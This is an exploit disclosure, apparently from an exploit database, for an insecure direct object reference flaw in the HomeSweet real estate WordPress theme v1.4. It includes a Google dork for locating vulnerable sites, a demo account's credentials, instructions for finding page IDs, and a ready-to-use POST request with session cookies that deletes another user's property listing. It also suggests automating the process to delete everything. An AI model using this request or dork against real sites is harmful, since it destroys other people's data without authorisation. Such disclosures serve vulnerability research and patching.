[+] Exploit Title: HomeSweet - Real Estate WordPress Theme v1.4 - IDOR leading to arbitrary deletion of ads [+] Google Dork: inurl:/wp-content/themes/homesweet/ [+] Date: 2020-06-17 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: ApusTheme [ https://themeforest.net/user/apustheme ] [+] Software Version: 1.4 [+] Software Link: https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-639 ### [ Info: ] [i] IDOR leading to arbitrary deletion of ads vulnerability was discovered in the HomeSweet Real Estate theme through 1.4 for WordPress. [i] Basic user account: vladvector / vector (login / password) [i] You need to know the unique ID of the page you want to delete, unless you are going to automate the process and delete everything at all. To find out the unique ID of any page, you should check the <body> tag -> class «postid-XXXX», where XXXX == unique page ID. ### [ PoC: ] [!] POST /homesweet/my-properties/ HTTP/1.1 Host: demoapus.com Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: https://demoapus.com Referer: https://demoapus.com/homesweet/remove-property/?id=2769 Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4a2f61dbe4052069fd7f20535e969bfa=vladvector%7C1592611943%7ChQcnlgehpsVMZNAWEc3mV7cpWnbxanBcHN9EpQQ7OLj%7C15f5fb0a9060ba32a5ac300e3d7bf2cbd00e4a039972fe87693eec0abef6ba16; __cfduid=d07a8a08f37a610559150403054bdcae31592415303; redux_blast=1592425112; PHPSESSID=9cbohsp0eo720ke2nuebbvau36; apus_preset=1547539960; hidde_popup_newsletter=1; homesweet_recently_viewed=3724%7C3725%7C3076%7C2089 property_id=2769&remove_property_form= ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector